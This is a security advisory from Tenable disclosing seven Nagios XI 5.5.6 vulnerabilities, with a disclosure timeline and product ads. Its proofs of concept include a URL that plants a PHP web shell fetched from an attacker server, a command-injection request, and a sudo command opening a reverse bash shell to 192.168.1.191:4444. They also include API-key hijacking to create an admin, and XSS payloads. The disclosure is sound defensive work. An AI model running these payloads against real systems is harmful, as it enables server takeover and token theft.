Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] Nagios XI Multiple Vulnerabilities

High

Synopsis

Tenable has discovered multiple vulnerabilities in Nagios XI 5.5.6.

CVE-2018-15708: Magpie_debug.php Unauthenticated RCE via Command Argument Injection

A critical vulnerability exists in the Snoopy 1.0 component which allows a remote, unauthenticated attacker to inject arbitrary arguments into a "curl" command. By requesting magpie_debug.php with a crafted value specified in the HTTP GET 'url' parameter, the vulnerable Snoopy component can be exploited to write arbitrary data to a location on disk that is writable by the 'apache' user. For instance, the location /usr/local/nagvis/share/ is writable and publicly accessible. If an attacker were to write PHP code to this location, arbitrary code execution may be achieved with the privileges of the apache user.

Combined with the local privilege escalation vulnerability, arbitrary code execution with root privileges is feasible.

Magpie_debug.php accepts an HTTP GET parameter, 'url', and subsequently calls fetch_rss() with the URL as an argument. The fetch_rss function is defined in /usr/local/nagiosxi/html/includes/dashlets/rss_dashlet/magpierss/rss_fetch.inc and is used to perform an HTTP request against the provided URL. Digging further, the _fetch_remote_file() function is called, which then instantiates a Snoopy object. The fetch() method of the Snoopy class is then called, which eventually ends up calling the _httpsrequest() method if an HTTPS URL was specified.

The Snoopy _httpsrequest() method has had a known vulnerability since at least 2008. Please see CVE-2008-4796 for reference. Versions 1.2.3 and earlier are stated to be affected, and Snoopy 1.0 is used in Nagios XI. A remote attacker can exploit this flaw without difficulty.

Specifically, the problematic code relates to this line in Snoopy.class.inc:

exec($this->curl_path." -D \"/tmp/$headerfile\"".escapeshellcmd($cmdline_params)." ".escapeshellcmd($URI),$results,$return);
Proof of Concept

Suppose an attacker sets up a web server at https://192.168.1.191:8080/. The attacker configures the server to respond with PHP code. Something like this:

<?php system($_GET['cmd']); ?>

The Nagios XI instance is located at https://192.168.1.208. Using the following URL, the attacker may exploit the flaw in Snoopy and write the PHP code to /usr/local/nagvis/share/exec.php. Notice that “-o /usr/local/nagvis/share/exec.php” is included in the value of the ‘url’ parameter. This tells curl to output the response to this file.

https://192.168.1.208/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=https://192.168.1.191:8080/%20-o%20/usr/local/nagvis/share/exec.php

Once this request is completed, the attacker can execute arbitrary system commands by crafting a URL like such:

https://192.168.1.208/nagvis/exec.php?cmd=whoami

CVE-2018-15709: Cmdsubsys.php Authenticated Command Injection

The Nagios subsystem is vulnerable to command injection in many cases. An authenticated attacker may inject and execute arbitrary OS commands. This can be accomplished by a low-privileged user (non-admin).

Ultimately, the subsystem commands are handled by /usr/local/nagiosxi/cron/cmdsubsys.php.

The proof of concept below exploits the command COMMAND_NAGIOSXI_SET_HTACCESS (1100) by injecting OS commands into the 'password' field. A code snippet is provided to show the vulnerable code. Please note that this is not the only vulnerable command.

case COMMAND_NAGIOSXI_SET_HTACCESS:
	$cmdarr = unserialize($command_data);	
	$cmdline = $cfg['htpasswd_path']." -b -s ".$cfg['htaccess_file']." ".$cmdarr["username"]." '".$cmdarr["password"]."'";
	break;
...
$output = system($cmdline, $return_code);
Proof of Concept

Be sure to replace the IP address and ‘nsp’ value accordingly.

https://192.168.1.208/nagiosxi/ajaxhelper.php?cmd=submitcommand&opts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22test%22,%22password%22:%22test%27%3bwhoami%20%3E%20/usr/local/nagiosxi/tmp/whoami.txt%3b%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=30a86418c0953be277b67c5149f9b4be762f08e14a92fcbece756922f5df2312

Afterward, it can be verified that the command worked as expected. Notice the user is ‘nagios’.

$ cat /usr/local/nagiosxi/tmp/whoami.txt
nagios

CVE-2018-15710: Autodiscover_new.php Local Privilege Escalation via Command Injection

autodiscover_new.php suffers from a local command injection vulnerability which can be exploited to gain root OS privileges. This file is protected by Source Guardian, so a full root cause analysis cannot be conducted. However, based on results of black box testing, it is clear that the value of the 'addresses' command line parameter is incorporated in a subsequent call to a dangerous PHP function used to launch another process. Furthermore, the value is unsanitized before being used to construct the command line. This coding flaw allows an attacker to inject and execute arbitrary shell commands.

Additionally, the /etc/sudoers file contains entries that enable this PHP script to be launched with root privileges without a password.

User_Alias      NAGIOSXI=nagios
User_Alias      NAGIOSXIWEB=apache
...
NAGIOSXI ALL = NOPASSWD:/usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php *
...
NAGIOSXIWEB ALL = NOPASSWD:/usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php *
Proof of Concept

If we put it all together, the 'apache' and 'nagios' users may exploit the command injection flaw to gain root privileges. Note that the payload in this case is a reverse bash shell connecting back to 192.168.1.191 over TCP port 4444.

sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/0;/bin/bash -i >& /dev/tcp/192.168.1.191/4444 0>&1;'

CVE-2018-15711: Unauthorized API Key Regeneration

A low-privileged, authenticated user can force API key regeneration for any Nagios XI user (including admins). When the API key is regenerated, a new one is returned in the response body. This enables the malicious user to then perform subsequent API calls with an elevated level of permissions. For instance, a new admin user could be created.

Proof of Concept

The following URL can be used to regenerate the API key for a user with ID 1 (nagiosadmin). Take note that the IP address and 'nsp' value will need to be updated accordingly.

https://192.168.1.208/nagiosxi/ajaxhelper.php?cmd=getxicoreajax&opts={%22func%22:%22set_random_api_key%22,%22args%22:{%22user_id%22:1}}&nsp=cc326511f1d7384bb9bf4ff619c9db91756574acb65217d27109923d6647a37e

The associated response looks like such:

HTTP/1.1 200 OK
Date: Tue, 23 Oct 2018 18:56:07 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
Content-Length: 64
Connection: close
Content-Type: text/html; charset=UTF-8

XKrjj3f20Fr49jiQF5E2LkZ3bl9spABmAjYSFdUV9FZBeBHTGhbnEaJ5PSQeIoTe

Note that the API key returned belongs to the user for which it was regenerated. In this case, the API key belongs to nagiosadmin. This serves as a privilege escalation within the Nagios XI application because more functionality can now be invoked.

For example, a new admin user could be added.

https://192.168.1.208/nagiosxi/api/v1/add_user&apikey=XKrjj3f20Fr49jiQF5E2LkZ3bl9spABmAjYSFdUV9FZBeBHTGhbnEaJ5PSQeIoTe&username=scrappy&password=scrappy&[email protected]&name=scrappy+do&auth_level=admin&api_enabled=1&force_pw_change=0&can_see_all_hs=1&can_control_all_hs=1&can_reconfigure_hs=1&can_control_engine=1&can_use_advanced=1

CVE-2018-15712: Api_tool.php Unauthenticated Persistent Cross-site Scripting

A persistent cross-site scripting (XSS) vulnerability exists in the Nagios XI Business Process Intelligence (BPI) component's api_tool.php. The file located at /usr/local/nagiosxi/etc/components/bpi.conf can be tampered with. An attacker is able to inject new entries by crafting the HTTP GET 'host' parameter value. This file is read by /nagiosxi/includes/components/nagiosbpi/index.php when a user opens the BPI view. A bpi.conf file that was tampered with could end up looking like the following. Take note of the second entry:

define linux-servers {
        title=HG: linux-servers
        desc=
        primary=1
        info=
        members=localhost;NULL;&, hello
}
define <script>alert(1)</script> {
desc=</strong><script>alert(2)</script>;NULL;&, 
        warning_threshold=0
        critical_threshold=0 
        priority=0
        type=hostgroup
        auth_users=
}
Proof of Concept

Note: Be sure to change IP addresses to match your environment. Two requests are required to inject the XSS payload:

https://192.168.1.208/nagiosxi/includes/components/nagiosbpi/api_tool.php?cmd=syncall

https://192.168.1.208/nagiosxi/includes/components/nagiosbpi/api_tool.php?cmd=addmember&group=linux-servers&host=hello%0a}%0adefine%20%3Cscript%3Ealert(1)%3C/script%3E%20{%0adesc=%3C/strong%3E%3Cscript%3Ealert(2)%3C/script%3E

Once these have completed, login with a valid user and visit the following URL:

https://192.168.1.208/nagiosxi/includes/components/nagiosbpi/index.php

CVE-2018-15713: Users.php Authenticated Persistent Cross-site Scripting

A persistent cross-site scripting vulnerability was discovered in Nagios XI in admin/users.php. This vulnerability requires authentication to be exploited successfully.

 

Specifically, the vulnerability exists due to the lack of input validation when displaying a user's e-mail address on admin/users.php. This value can be defined by modifying a user's e-mail address via /account/main.php or /admin/users.php. Users.php requires an administrator level of access; however, main.php does not. This means that a low-privileged user can inject an XSS payload, and an admin user will be impacted by the attack.

Fortunately, cookies are flagged as 'httpOnly', so malicious JavaScript can't access the session ID stored in the cookie. However, the Nagios Session Protector (nsp) value may be accessed because it is stored in the DOM. This will allow an attacker to steal these tokens and subsequently create malicious forms or links to facilitate request forgery.

Proof of Concept

In order to test the PoC’s, replace the IP address with an accessible IP or hostname which has a Nagios XI instance installed/configured, update the 'nsp' value, and update the cookie accordingly.

POST /nagiosxi/account/main.php?page=acctinfo HTTP/1.1
Host: 192.168.1.208
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.208/nagiosxi/account/main.php?&=
Content-Type: application/x-www-form-urlencoded
Content-Length: 359
Cookie: nagiosxi=sg3pa9fi5e4ngj6a4jgm287jg7
Connection: close
Upgrade-Insecure-Requests: 1

update=1&nsp=e7fc3b0557861b1f39d6a2827edcf515086c7f2ec96acdd885a952266ba437be&current_password=&password1=&password2=&name=Scooby+Doo&email=%3Cscript%3Ealert%28%22hello+poppet%22%29%3C%2Fscript%3Escooby1%40tenable.com&language=en_US&theme=&highcharts_default_type=line&defaultDateFormat=1&defaultNumberFormat=2&defaultWeekFormat=0&updateButton=Update+Settings

POST /nagiosxi/admin/users.php?edit=1&user_id[]=2 HTTP/1.1
Host: 192.168.1.208
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.208/nagiosxi/admin/users.php?edit=1&user_id[]=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 498
Cookie: nagiosxi=sg3pa9fi5e4ngj6a4jgm287jg7
Connection: close
Upgrade-Insecure-Requests: 1

update=1&nsp=02bc33485c2fd6edac30ee7e7af1a2f14d47c36ffb9cd8c9b5e74721bb886dbd&users=1&user_id%5B%5D=2&username=scooby&password1=&password2=&name=Scooby+Doo&email=%3Cscript%3Ealert%28nsp_str%29%3C%2Fscript%3Escooby1%40tenable.com&phone=&enable_notifications=on&enabled=on&language=en_US&defaultDateFormat=1&defaultNumberFormat=2&defaultWeekFormat=0&auth_type=local&ad_username=&dn=&level=1&ccm_access=0&apikey=jt2ZRc3fdPnn6VSKn3QZZdSVabJp7tbJZcY8n2mT7MBcYpdFMjU2PMXYeWHkpRkJ&updateButton=Update+User

CVE-2018-15714 - Checkauth.php Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability exists within account/checkauth.php. The HTTP GET 'oname' parameter is not processed safely; therefore, malicious JavaScript can be injected and executed. Other parameters are exploitable as well (such as 'oname2');

For example, the following code snippet from checkauth.php outputs the values of the 'oname' and 'oname2' parameters into the HTML response.

<td>Object Name:</td>
<td><input type="text" name="oname" value="<?php echo $oname; ?>" size="15">
<input type="text" name="oname2" value="<?php echo $oname2; ?>" size="15"></td>
Proof of Concept
https://192.168.1.208/nagiosxi/account/checkauth.php?oname=" autofocus onfocus="javascript:alert(nsp_str)

Solution

Upgrade to Nagios XI 5.5.7.

Disclosure Timeline

10/23/2018 - Tenable discloses vulnerabilities to Nagios. 90-day date is set to 01/22/2019.
10/30/2018 - Tenable attempts to establish communication for a second time. 
10/30/2018 - Nagios security responds. Regarding the bugs, they will be "testing them this week and fixes to them should be in the product soon." Nagios asks who should be credited with the findings. 
10/30/2018 - Tenable replies asking that we be provided with a fix date once they have verified the vulnerabilities. We ask that "Chris Lyne of Tenable" is credited. 
10/31/2018 - Nagios states that all vulnerabilities have have verified. Patches will be released in the first half of November in version 5.5.7. 
10/31/2018 - Tenable asks if a security bulletin will be released and whether we need to assign CVEs. We also ask Nagios to please keep us updated. 
10/31/2018 - Nagios agrees to keep us updated. A "news post and email" will be sent out after the release of 5.5.7. Nagios asks Tenable to assign CVEs. 
11/01/2018 - Tenable sends Nagios the range of reserved CVE numbers to be assigned to these vulnerabilities
11/05/2018 - Nagios informs us that 5.5.7 release date is scheduled for 11/13/2018.
11/12/2018 - Tenable asks if 5.5.7 is still on track for release on 11/13/18.
11/12/2018 - Nagios confirms 5.5.7 is to be released on time.
11/13/2018 - Nagios XI 5.5.7 is released.
11/13/2018 - Nagios informs Tenable of release.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Try for Free Buy Now

Try Tenable.io

FREE FOR 60 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now and run your first scan within 60 seconds.

Buy Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

$2,190.00

Buy Now

Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save

Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 60 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now and run your first scan within 60 seconds.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578.00

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 60 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Learn More about Industrial Security